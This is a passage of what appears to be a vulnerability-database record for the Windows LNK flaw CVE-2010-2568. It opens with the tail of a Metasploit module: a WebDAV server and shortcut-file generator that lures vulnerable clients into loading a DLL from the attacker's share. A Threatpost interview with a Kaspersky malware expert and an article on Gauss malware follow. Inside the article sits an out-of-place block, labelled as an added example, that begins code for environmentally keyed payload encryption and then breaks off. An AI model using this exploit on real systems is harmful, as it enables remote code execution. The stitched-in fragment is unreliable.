...\") \nresp = create_response(301, \"Moved\") \nresp[\"Location\"] = path + \"/\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nend \nend \n \nprint_status(\"Sending directory multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> 
\n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \n \n \nsubdirectory = %Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{Rex::Text.rand_text_alpha(6)}/</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \n \nfiles = %Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_dll}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> 
\n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_lnk}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>shortcut</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \nif request[\"Depth\"].to_i > 0 \nif path.scan(\"/\").length < 2 \nbody << subdirectory \nelse \nbody << files \nend \nend \n \nbody << \"</D:multistatus>\" \n \nbody.gsub!(/\\t/, '') \n \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml; charset=\"utf8\"' \ncli.send_response(resp) \nend \n \ndef generate_link(unc) \n[ 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, \n0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x14, 0x00, 0x1f, 0x00, 0xe0, 0x4f, \n0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d, 0x14, 0x00, 0x2e, 0x1e, 0x20, 
0x20, 0xec, 0x21, 0xea, 0x3a, \n0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d, 0x0c, 0x01, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack(\"C*\") + \nunc.unpack(\"C*\").pack(\"v*\") + \"\\x00\\x00\" \nend \n \ndef exploit \n \nmyhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] \n \n@exploit_unc = \"\\\\\\\\#{myhost}\\\\\" \n@exploit_base = rand_text_alpha(rand(8)+4) \n@exploit_lnk = rand_text_alpha(rand(8)+4) + \".lnk\" \n@exploit_dll = rand_text_alpha(rand(8)+4) + \".dll\" \n \nif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' \nraise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' \nend \n \nprint_status(\"\") \nprint_status(\"Send vulnerable clients to #{@exploit_unc}#{@exploit_base}\\\\\") \nprint_status(\"\") \nsuper \nend \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/91994/ms10_xxx_windows_shell_lnk_execute.rb.txt"}], "threatpost": [{"lastseen": "2018-10-06T23:01:42", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "The last year has seen a lot of changes in the threat landscape, with the emergence of a number of new cyber espionage tools such as Gauss and Flame, as well as an increase in the volume of malware targeting mobile platforms such as Android. Recently, Alex Gostev, the chief malware expert at Kaspersky Lab, answered questions submitted by users on Facebook, discussing the evolution of antimalware solutions, the threats to mobile devices and how governments around the world are handling the cybercrime explosion.\n\n**Hi Alex, I would like to ask about cyber spying. You know, we make a lot of overseas calls via Skype in business today. 
Is there a wiretapping risk with Skype calls?**\n\n**Alex Gostev**: If the computer of the Skype user is infected with a malicious program capable of recording voice traffic (or intercepting data from a microphone), then, naturally, any voice communication via Skype can be intercepted. This is not just a theoretical possibility; incidents like this have in fact taken place repeatedly, and have even involved software created by law enforcement agencies. For example, [an incident of this kind took place in Germany](<http://www.securelist.com/en/blog/208193167/Federal_Trojan_s_got_a_Big_Brother>) last year.\n\n**Are governments around the world coping with cybercrime or just studying it? **\n\n**Alex Gostev**: The main problem with fighting cybercrime today is its global character. Undoubtedly, many countries in the world have achieved notable success in combating this threat; however, the most serious crimes can only be investigated successfully if there is international cooperation. Unfortunately, this is an area where problems do exist: a number of countries, for one reason or another, are not involved in international initiatives to fight cybercrime.\n\n**How did you manage to become who you are? Where did you get all that knowledge? **\n\n**Alex Gostev**: That\u2019s a tough one. It was back in 1994 when I came across my first computer viruses; I only joined Kaspersky Lab in 2002. So you could say I gained most of my knowledge about viruses on my own. Take my word for it: there is sufficient information available on the Internet both to learn to analyze malicious programs and to understand the current trends in cybercrime and threat evolution. So, I suggest you read as many sites and expert blogs as you can, and try to reproduce their findings on your own; try to understand how the experts came to the conclusions they write about. 
Kaspersky Lab has three expert blogs: [Securelist](<http://www.securelist.com>), [Threatpost](<https://threatpost.com/interview-kaspersky-chief-malware-expert-alex-gostev-122412/>) and our new consumer [blog](<http://blog.kaspersky.com/>).\n\n**Why is it that virus makers mostly target the Windows operating system? **\n\n**Alex Gostev**: The answer is simple: over 90% of users are on Windows. There is a similar situation when it comes to mobile platforms: Android leads the pack both in terms of users and malware.\n\n**They say that it\u2019s cyber war out there. Has Kaspersky been attacked? **\n\n**Alex Gostev**: Just like any other company involved in information security, Kaspersky Lab is a frequent target for attacks. This is to be expected. And, of course, we use the most reliable technologies to protect us from such attacks.\n\n**I want to work for Kaspersky\u2019s GReAT team. What would be the best college to finish and courses to take? **\n\n**Alex Gostev**: A technical education is important. There\u2019s no one college or set of courses that\u2019s the best to become a security researcher, but a good knowledge of operating systems, programming languages and a willingness to work hard are essential.\n\n**How many threats are added to Kaspersky databases daily to provide effective protection to everyone? What\u2019s the comparison to free antivirus solutions? **\n\n**Alex Gostev**: At the present time, we detect some 200,000 new malicious programs every day. Naturally, it takes serious resources \u2013 both human and technical \u2013 to collect and process such huge volumes of threats. Besides malicious files, there are also other types of threats including malicious sites, network attacks, exploits etc. that we also need to keep tabs on. All this requires an extensive financial outlay. 
Independent testing shows that we have an edge over freeware security tools.\n\n**With nations increasingly using harmful software on their enemies, what do you think about this? What\u2019s Kaspersky\u2019s stance on this? Has Kaspersky been approached by governments? What do you foresee for the future of industrial/governmental cyber warfare? What\u2019s Kaspersky\u2019s future in this? **\n\n**Alex Gostev**: That\u2019s a difficult question that really merits a separate article. In a nutshell, our first, major priority is to protect our users. So we will protect them from all types of malicious programs regardless of who creates them. It is also our aim to communicate a simple message to the world\u2019s governments: any malware can also be used against its creators; unintended targets can also become victims. Cybercrime must become subject to international law and must come under the regulations and monitoring of the global community.\n\n**Anything to protect us from our own government? **\n\n**Alex Gostev**: We protect against malicious programs without making any distinctions as to who created them.\n\n**I know that Windows Phone is not considered a virus target, but for those of us who want more security for our phone and feel left out, why is it so hard to make virus protection for Windows Phones? **\n\n**Alex Gostev**: There are no problems whatsoever about creating antivirus protection for Windows Phone (at least, Kaspersky Lab does not have any problems doing it).\n\n**Why do people say Apple computers don\u2019t get viruses when they actually get more than people think? **\n\n**Alex Gostev**: These are old stereotypes that were created primarily by Apple themselves. Apple have claimed for a long time that their computers are much better protected. 
Eventually, they admitted that malware does exist for Apple computers and even incorporated a [primitive antivirus scanner into OS X](<https://threatpost.com/apple-malware-blocker-left-dead-010410/>). Microsoft, for instance, also had to spend a decade or so learning to take virus threats seriously. Apple is only taking its first steps along this road, but we think they are moving in the right direction, especially if you look at the protection system on the iPhone.\n\n**Alex, what\u2019s the best way of preventing your computer being infected and locked and asked to pay a steep fee to unlock it? **\n\n**Alex Gostev**: In the overwhelming majority of cases involving extortion malware, or [ransomware](<https://threatpost.com/ransomware-scams-netting-criminals-33000-day-110812/>), the victim computer is infected via a web browser. This is usually down to vulnerabilities in Java, Adobe Flash or in the browsers themselves. All these vulnerabilities have long been known and patched by the vendors. So, your first step should be to install all the latest patches and updates for your software on a regular basis.\n\n**What are the main Android threats?**\n\n<http://www.securelist.com/en/analysis/204792254/Kaspersky_Security_Bulletin_2012_Malware_Evolution>\n\nSee point 3 (\u201cThe explosion of Android threats\u201d) and item 10 (\u201cMobile malware\u201d) in this security bulletin.\n\n**Why does Kaspersky often (maybe very often) recognize \u201cgood\u201d software as malicious? **\n\n**Alex Gostev**: I have to disagree with you on this one. Kaspersky Lab\u2019s products have one of the lowest false positive rates in the entire industry; independent test results back up this claim. We couldn\u2019t possibly have received the \u201c[Product of the year](<http://eugene.kaspersky.com/2012/01/27/were-av-comparatives-product-of-the-year/>)\u201d award unless we had demonstrated the fewest false positives in dedicated testing.\n\n**Which web browser do you prefer? 
Which one is more secure? Which one is the best solution for Kaspersky products?**\n\n**Alex Gostev**: At the current time, I prefer Google Chrome. Which browser is the safest? Well, the answer to that is changing all the time. The situation can change in an instant \u2013 the discovery of a 0-day vulnerability would immediately turn the safest browser into the most vulnerable one. Therefore, apart from keeping an eye on the browser vulnerability situation, it is also advisable to complement your browser with dedicated protection tools, such as a sandbox, whitelisting etc. All these things are implemented in Kaspersky Lab\u2019s products.\n\n**What are the most \u201cfashionable\u201d viruses today? What was the most unusual virus detected last year?**\n\n**Alex Gostev**: Depends what you mean by \u201cfashionable\u201d. If we\u2019re talking about high-profile malware, it would primarily be a whole new generation of malware in the Middle East which includes [Flame](<http://www.securelist.com/en/blog/208193522/The_Flame_Questions_and_Answers>), [Duqu](<http://www.securelist.com/en/blog/208193178/Duqu_FAQ>), [Gauss](<http://www.securelist.com/en/blog?topic=199380371>), [miniFlame](<http://www.securelist.com/en/analysis/204792247/miniFlame_aka_SPE_Elvis_and_his_friends>) and [Wiper](<http://www.securelist.com/en/blog/208193808/What_was_that_Wiper_thing>). All these kept us fairly busy throughout the year, both in terms of searching for and analyzing the findings. The realm of cyber weapons, i.e. malware created at the state level to attack the citizens, companies and authorities of other countries, is probably the hottest and most interesting topic right now.\n\nAs for unusual malware, there were traits in every single program mentioned above that we thought (and still think) were unusual. 
For instance, one of the Gauss modules installs a modified proprietary [font called Palida Narrow into the system](<https://threatpost.com/researchers-release-detection-tool-gauss-malwares-palida-narrow-font-081012/>). Why it does this remains a mystery. Another example is the propagation module incorporated into the Flame worm \u2013 it helps the worm spread via local area networks, and that is a whole other story. Its creators have not only successfully implemented an unprecedented [MD5 cryptographic attack](<https://threatpost.com/forthcoming-sha-3-hash-function-may-be-unnecessary-092412/>) but have also created a \u201creal\u201d Microsoft certificate. This is way beyond a 0-day vulnerability \u2013 this is \u201cgod mode\u201d. Nothing like this has occurred before.\n\n**Is being a virus analyst a difficult job?**\n\n**Alex Gostev**: It\u2019s only difficult for the first few years. After that, once you\u2019ve gained experience, it gets easier. I remember about six years ago we organized competitions in our Virus Lab to see who could analyze malware the fastest. The record was 43 seconds from a file arriving for analysis till a detection was added. On the other hand, virus analysis is only a small part of the job. You have to be well informed about all developments, including news from your competitors and news from the other side of the front line; you need to be aware of where it\u2019s all going and what will happen tomorrow. I suppose this is the most difficult part, and it\u2019s getting more difficult every day.\n\n**What new types of malware does the near future have in store for us? **\n\n**Alex Gostev**: There are unlikely to be any new types of malware. All the generic types of malware behavior have long been identified and malware, including viruses, worms, Trojans and exploits, are evolving along those lines. Of course, dozens of subtypes exist within each category, such as Trojan cryptographers, banking Trojans, network worms etc. 
However, malware evolution takes place exclusively in terms of seizing new platforms or operating systems \u2013 mobile Trojans are a vivid example. From the point of view of technology, everything is the same, but with new platforms and new possibilities, such as the sending of SMS text messages. Therefore, we expect all the conventional types of threats to migrate in the near future from personal computers to the entire range of modern devices.\n\n**Alex, do you keep a diary for yourself? E.g. I came across such and such a malicious program today. I was able to treat it in such and such a way. Tried such and such a dish and liked it. The weather was nice, etc.**\n\n**Alex Gostev**: No, I simply don\u2019t have time for that. Time and again I think that it might be worthwhile writing down how my research is going. I think it would make a pretty interesting book. On the other hand, many of the things we\u2019re involved in and the things we\u2019re aware of cannot be published (yet).\n\n**Which operating system do you use? Which do you think is the safest for desktops?**\n\n**Alex Gostev**: I am not a dedicated fan of any specific operating system; in fact, I have a very simple view on them: for every task, there exists a suitable operating system. I arrange my work accordingly. In a single day I can work under Windows, OS X and Linux, not to mention mobile platforms for phones and tablet PCs.\n\nThere are no secure desktop operating systems. Any operating system can only be called secure on a conditional basis until the next 0-day vulnerability emerges. When this happens, it instantly turns the safest operating system into the most vulnerable one. I\u2019m talking here about a situation where the vulnerability is publicly disclosed. 
As for privately known vulnerabilities, well, they always exist for any given operating system.\n\n**How much of his work time does a senior virus analyst put into practical, hands-on work, such as reverse engineering, debugging and sandboxing?**\n\n**Alex Gostev**: It depends on the time of the year and the research project the team is working on at a specific time. Sometimes, I can spend 80% of the day on hands-on research of a specific piece of malware. That may last for, say, a week. Sometimes I don\u2019t touch a single malware file for an entire day. If you look at the bigger picture, I\u2019d say I spend no more than 20% of my time throughout the year on hands-on research. However, when I was a virus analyst processing the inbound malware traffic, it took up 100% of my time. Now, I have to do a lot of non-core activities, such as giving answers to your questions \ud83d\ude42\n\n**What make of smartphone or telephone does Alexander use (which manufacturer, model)? Does he have a mobile security solution installed on it?**\n\n**Alex Gostev**: At the moment I have an iPhone 3. It is a corporate phone. I don\u2019t have any antivirus on it, because: a) no antivirus solution exists for iPhones; b) it has not been jailbroken; c) there are no viruses for non-jailbroken iPhones anyway.\n\n**How do I properly uninstall Kaspersky Lab\u2019s products so no garbage is left in the system and registry?**\n\n**Alex Gostev**: The \u201cproper\u201d way is to use the standard uninstaller. Should anything go wrong and the result is not satisfactory, use the dedicated removal tool: <http://support.kaspersky.com/faq/?qid=208279463>\n\n**How can I get rid of my paranoia and obsession that there is a Trojan in the system, or a vulnerability is being exploited?**\n\n**Alex Gostev**: Why would you want to get rid of it? When it comes to IT security, paranoia is actually a positive thing, as it makes you more careful about what you do and how you do it. 
It makes you try to figure out how the system works, promotes your self-development and broadens your outlook. In other words, it\u2019s a good thing.\n\n**At work, I often have to compile all types of DLL files. Security software pretty often reports them as being potentially dangerous, even after I block heuristic analysis. What can I do other than adding exclusion rules into the work directory?**\n\n**Alex Gostev**: I can\u2019t give recommendations unless I have a complete understanding of which files you use, which functions you use, what type of warnings your security software gives, what it specifically reports etc. If you are totally sure that your files are clean (beware though, there may be surprises, e.g. check out the history of the Induc virus), then go ahead and add them to the exclusion rules and contact your security provider\u2019s support line and let them find out what the reasons are for the false positives.\n\n**How safe is it to use cloud-based storage? Do you know of any cases where the cloud has been infected?**\n\n**Alex Gostev**: Ah, this is a major topic. There was a recent newspaper publication about this in which I feature. Unfortunately, it\u2019s only in Russian. For those of you who know Russian, check it out here: <http://www.kommersant.ru/doc/1771693>\n\n**Can you please tell us about how Kaspersky\u2019s Virus Encyclopedia documentation is created?**\n\n**Alex Gostev**: These days, 99% of the malware descriptions in Kaspersky\u2019s Virus Encyclopedia have been created by a robot using standard templates and based on automatic analysis of files. Several thousand old descriptions also exist that were written by humans (yes, there used to be a time when a new dedicated description could be created for each new virus). 
Several hundred of them were created specifically by me.\n\n**The management of one large company says that Kaspersky Lab writes viruses and creates zombie networks to infect computers in the Russian segment of the Internet, in order to sell more of their products and provide consulting services. Can you please comment on this. I can’t disclose the name of the company as I work for it.**\n\n**Alex Gostev**: I recommend you change your employer. If your management has such a mindset, you never know what they’ll come up with next.\n\n**Can you dispel the myth that working in IT security is the preserve of men. It would be great if you could also provide some supporting facts.**\n\n**Alex Gostev**: This is in fact not a myth, but the current reality. Men do indeed make up the majority of experts in this field. Having said that, there are women who work in IT security, and all of them demonstrate a greater professionalism than most men working in this area. In my private view, a woman working in IT security has to demonstrate a very high level of professionalism. All the women I know who work in this sphere are very good specialists, but there are so few of them. Furthermore, they are so well known in their profession (especially in Russia) that no proof is really necessary.\n\n**What can you say about the antivirus that is incorporated in Windows 8? This takes away quite a bit of business from the security software manufacturers. How would you comment on this?**\n\n**Alex Gostev**: It’s been quite a while since it was incorporated, and quite a while since it’s been “taking away business”. The thing is, it never did in fact take any business. The simple fact is that in order to develop successful security solutions, a company needs to specialize in developing those solutions. That must be their core business. 
That cannot be said of Microsoft.\n\n**My friends say Kaspersky Anti-Virus is a resource-hungry monster, and recommend that I use free antivirus solutions (I won’t advertise them here). Their argument is: free antivirus is no worse, in fact they are better in many respects. Is this correct?**\n\n**Alex Gostev**: No, and I can’t be bothered disproving it here. I personally would never use a free antivirus, even if I didn’t work for Kaspersky Lab. I know how this type of software works, who works on these programs and how.\n\n**Which antivirus manufacturers do you feel most envious of? Would you agree to work for them if they paid you enough?**\n\n**Alex Gostev**: Well, I’m not envious of anyone. There are companies that I have respect for – these are primarily the companies that can make good use of the resources they have, both human and technical, where the work of the specialists makes me say: “How the hell did they find this before us or do a better job of analyzing than us!” This really stimulates competition, and, as a consequence, our level of expertise improves as well.\n\nIn recent times, I’ve only seen this sort of interesting, motivating competition between us and Symantec. To be more precise, between Kaspersky’s team of experts (GReAT) and their STAR team. That said, we cooperate very closely with them on a number of research topics, and have good personal relationships with them.\n\nAs for working for a different antivirus company – well, I think I’ve become too much of a Kaspersky man. I’d be more likely to change the IT security sphere for a different, but related area. Or set up my own business.\n\n**How do you attract clever students and specialists to your company? Is there a chance they will later be recruited by secret services (foreign or Russian)? 
Or is this the first time you’ve heard about this?**\n\n**Alex Gostev**: How we attract new employees is a business secret 🙂 As for being recruited by secret services, I didn’t in fact understand that one. Secret services can recruit anyone – taxi drivers, bakers, managers (ourselves not excluded), so what? Kaspersky Lab has its own security service, and it does a great job. This question is within their competence.\n\n**When I was reverse engineering one of your products, namely Kaspersky CRYSTAL v12.0.1.288, I discovered the following comment:**\n\n**//I am not responsible for this code**\n\n**//I was forced to write it against my will**\n\n**This is an Easter egg, right?**\n\n**Alex Gostev**: When programs get compiled, the comments existing in the source code do not enter the final code – every programmer knows this. So you could not have obtained that by reverse engineering.\n\nRead about the prehistory of that case: <http://stackoverflow.com/a/216744>\n\n**Is a hardware firewall in the router enough? Or maybe, besides that, it’s good to have a software firewall?**\n\n**Alex Gostev**: The firewalls in modern routers are pretty limited in terms of their functionality, and perform primitive filtering at the level of port addresses. Naturally, this solution is not adequate for complete security.\n\n**I want to ask about security in Linux. How does Kaspersky Lab approach this system from a security aspect? Do you study the number and geography of threats for Linux. Do such threats evolve in any way, and are they really dangerous? Linux users are convinced that they are secure, and malware does not pose any threat to them. You can read tons of comments like “I’ve got Linux, I’m secure”. What do you think about this?**\n\n**Alex Gostev**: There are far fewer attacks against Linux than Windows or even OS X, for that matter. 
The user base isn\u2019t as large as Windows and so the target isn\u2019t as attractive for attackers. There are vulnerabilities and other threats for Linux systems and have been since the beginning, but malware isn\u2019t a major issue on Linux.\n\n**Recently, I read that Android is the most unsafe mobile operating system. Do you agree? Which mobile OS is, in your opinion, the most secure?**\n\n**Alex Gostev**: Yes, I agree that Android is the most vulnerable mobile platform. The safest is iOS.\n\n**Stuxnet, Duqu, Flame and the latest Gauss have infected millions of computers, spying on their activities without the user realizing it. How is it possible that, despite the improvements antivirus products constantly make in detecting and blocking malware based on the behavior of executable files, Stuxnet and co. have not been noticed and detected? For example the spread via USB flash drive by autorun.inf using the CVE-2010-2568 vulnerability in the *.LNK file, or sending data to a remote server \u2013 how is this possible? What does Kaspersky Lab plan to do to fight cyber-espionage? What will be the next Gauss?**\n\n**Alex Gostev**: First of all, the Duqu, Flame and Gauss incidents do not involve millions of computers \u2013 at most they affected thousands. In fact, Duqu and miniFlame only affected a few dozen computers. Second, we\u2019re talking about programs that cost millions and that had input from dozens of people. These are not typical cyber threats \u2013 they are cutting-edge, complex threats. Obviously, learning how to reliably detect and block them takes time. It should be noted here that KL was the first company to detect and carry out in-depth analysis of them. We are the best in the world at detecting these sorts of threats \u2013 and that\u2019s a fact. We\u2019ll use the knowledge we\u2019ve gained to seek out other similar threats. 
\n\n**Why does Kaspersky slow my PC down so much?**\n\n**Alex Gostev**: A good level of protection will always require some use of computer resources. There are software products out there that call themselves antivirus solutions and which operate faster than our product, but the level of protection they provide is nowhere near that offered by Kaspersky Lab. We don’t see the point of lowering the level of protection, because just one missed virus out of millions detected can cause a user major problems. We are constantly working on new technologies that will allow us to depart from older protection methods, such as the multi-level scanning of files. These technologies will use less computer resources, but also ensure the highest level of protection is maintained.\n\n**What is the role of Cloud Protection in Kaspersky’s 2012 product versions? What are the pros besides the basic protection?**\n\n**Alex Gostev**: The reaction time of the cloud to new threats is generally several times greater than that offered by traditional signature databases. Cloud protection is intended primarily to prevent the user being affected by the very latest threats.\n\n**Your antivirus is useful against viruses and Trojans whose signatures are already known and the code is already recognized as malicious. What about “hand made” viruses with hidden code?**\n\n**Alex Gostev**: Signature-based analysis is a tried-and-tested method of detecting threats, but on its own against today’s threats it’s virtually useless. That’s why our product uses behavioral analyzers capable of determining whether a program is behaving itself or not.\n\n**When installing Kaspersky Anti-Virus together with another antivirus solution, why does Kaspersky tell you to remove them, but they don’t say anything about Kaspersky? 
I found this rather strange.**\n\n**Alex Gostev**: To ensure a high level of protection and avoid any conflict with other programs, we recommend users uninstall all other antivirus products before installing our product. It is technically possible to have two or three antivirus solutions on one machine, but it will mean the computer is overloaded and will slow it down considerably.\n\n**Why don’t you contact rutracker.org and tell them to stop distributing your products?**\n\n**Alex Gostev**: Let them carry on – we don’t mind 🙂\n\n**Is Kaspersky Mobile Security good enough to protect my Android phone? Also, why are there different prices for KMS on Google Play and on kaspersky.com sites?**\n\n**Alex Gostev**: Kaspersky Mobile Security is one of the best mobile AVs (and this is not just our opinion, PPCSL, AV-Test and other independent test agencies say the same). So, in answer to your first question, yes, it is. There are some differences between the update speeds on the GPlay and Kaspersky Lab websites and the tech support terms are also different (on GPlay you can get only limited support via email).\n\n**When will a control plug-in for browsers be implemented in KAV or KIS?**\n\n**Alex Gostev**: Is it really necessary? It’s much easier and more effective to open the product and make all the necessary changes there. If you’re talking about tuning the product settings, it is more effective to make all the necessary changes there. Also, we need to isolate our UI settings from malware and other processes to ensure the protection level.\n\n**Today we download loads of free apps to our gadgets. 
Can the attacker take advantage and disguise them as Trojans to compromise our systems and break into other remote targets?**\n\n**Alex Gostev**: There are indeed lots of [Android Trojans](<https://threatpost.com/android-trojan-apps-build-sms-botnet-121812/>) spreading not only in the guise of legitimate apps but also embedded by malicious users in popular programs. To do this they create their own modifications of the original app package where the Trojan module is added.\n\nHere are some recent examples of this:\n\n * http://www.msnbc.msn.com/id/48150203/ns/technology_and_science-security/t/fake-android-game-apps-sneak-malware-google-play/#.UMb3QYNnjgg\n * http://thenextweb.com/google/2012/10/05/over-60-percent-of-android-malware-comes-from-one-family-hides-in-fake-versions-of-popular-apps/\n\nand it’s also worth reading [our report on mobile malware in 2012](<http://www.securelist.com/en/analysis/204792255/Kaspersky_Security_Bulletin_2012_The_overall_statistics_for_2012#1>).\n", "modified": "2013-04-17T16:31:03", "published": "2012-12-24T16:50:29", "id": "THREATPOST:177DA099F0CCEE2A79F823573B22840A", "href": "https://threatpost.com/interview-kaspersky-chief-malware-expert-alex-gostev-122412/77341/", "type": "threatpost", "title": "Interview with Kaspersky Chief Malware Expert Alex Gostev", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:28", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "A new piece of malware dubbed Gauss, that experts say is a direct descendant of Flame and also related to Stuxnet and Duqu, has been found on thousands of PCs in the Middle East, mostly in Lebanon. 
Gauss contains some of the same code as Flame, but is markedly different in a number of respects, specifically in its ability to steal online banking credentials, and it carries an encrypted payload that experts haven’t yet been able to crack. Researchers say that Gauss is almost certainly the work of the same team that wrote the [Flame malware](<https://threatpost.com/diving-flame-researchers-find-link-stuxnet-061112/>), which they speculate is a state-sponsored group.\n\nGauss is built on the same platform as Flame and has some of the same attributes, including the ability to infect USB sticks connected to compromised machines. Researchers discovered the Gauss infections earlier this year during the investigation into the Flame attacks and estimate that there are about 2,500 infections so far. While looking at the various modules of Flame, researchers found one that didn’t quite match up with the rest of the tool and began looking into it further. What they found was a series of other modules, similar to Flame, some of which were already detected by antimalware products, and others that were not.\n\nGauss, like Flame, has a modular architecture and contains a number of pieces that perform discrete tasks. The tool is capable of stealing browser cookies and passwords, stealing account information for social networks and IM applications, intercepting online banking credentials for a handful of Middle Eastern banks as well as PayPal and Citibank, and infecting USB drives with a data-stealing module. When a clean USB thumb drive is connected to a Gauss-infected PC, the malware copies itself to the USB drive. Then, when the drive is connected to a clean PC, the Gauss malware runs from the USB drive and collects whatever data it can from the new machine; the collected data is retrieved from the drive when it is next inserted into a Gauss-infected computer. 
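The encrypted payload mentioned above is, as the article explains further down, locked with a key derived from variables taken from the infected system, so an analyst holding only the binary has nothing to work with. The block below is an added example written for this page, not Gauss's code and not Kaspersky's: it shows the general shape of such an environmental-keying scheme. The choice of candidate strings (each PATH entry joined to each Program Files folder name), the salted iterated MD5, the use of RC4 for the payload, the two salts, the payload bytes and both sample environments are all this example's own assumptions, constructed for the demonstration.

```python
"""Environmental keying: a payload that decrypts only on the intended host.

Added example for this page; not Gauss's code. The article says only that the
key is derived from system variables. The concrete construction here is the
example's own choice, and every value below is constructed for the demo.
"""
import hashlib

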